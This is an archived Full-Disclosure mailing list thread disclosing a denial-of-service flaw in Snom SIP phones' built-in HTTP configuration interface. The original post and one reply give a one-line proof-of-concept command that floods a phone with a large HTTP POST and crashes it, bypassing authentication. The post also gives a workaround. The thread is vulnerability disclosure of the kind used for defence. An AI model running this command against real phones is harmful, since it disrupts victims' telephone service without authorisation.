lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Date: Tue, 13 Jan 2015 09:26:42 +0100
From: Max Mühlbronner <mm@...om.com>
To: fulldisclosure@...lists.org
Subject: Re: [FD] Snom SIP phones denial of service through HTTP

Hi,


it works fine for me:

dd if=/dev/zero bs=1M count=32 | curl http://SNOMIP  --data-binary @-


Phone crashes after just a few seconds.


Best Regards

Max M.

On 12.01.2015 22:20, Martin Schuhmacher wrote:
> Hi
>
> i just did
>
> $ dd if=/dev/zero bs=1M count=32 | curl http://$IP/
> Response: Unauthorized request
>
> did i miss anything?
>
> Firmware: snom360-SIP 8.7.4.8
> not downloadable any more for some reason?
>
> Yours
> Martin
>
> _______________________________________________
> Sent through the Full Disclosure mailing list
> http://nmap.org/mailman/listinfo/fulldisclosure
> Web Archives & RSS: http://seclists.org/fulldisclosure/

On 12.01.2015 17:56, kapejod@...glemail.com wrote:
> Snom SIP phones (www.snom.com) have a builtin HTTP/HTTPS configuration
> interface, which is enabled by default.
>
> By making a single HTTP POST request all available memory (and CPU) can be
> exhausted, resulting in a reboot of the phone.
> This even works if the HTTP/HTTPS interface is protected by username and
> password (probably the credentials are checked a few more lines later when
> the complete request has been received).
>
> Affected models: MP, 3XX, 7XX, 8XX (i didnt have any of the other models to
> test)
> Affected firmwares: latest stable, latest beta (most likely some others too)
> Workaround: Disable HTTP/HTTPS interface completely.
>
> Poc:
>
> dd if=/dev/zero bs=1M count=32 | curl http://IP_OF_PHONE
> <http://ip_of_phone/> --data-binary @-
>
> P.S. Just if you are wondering.... I did not notify the vendor about this.
> Almost two years ago i reported multiple vulnerabilities directly to the
> vendor (including the possibility to install arbitrary software on the
> device), but not much has changed since then.
>
> _______________________________________________
> Sent through the Full Disclosure mailing list
> http://nmap.org/mailman/listinfo/fulldisclosure
> Web Archives & RSS: http://seclists.org/fulldisclosure/


_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ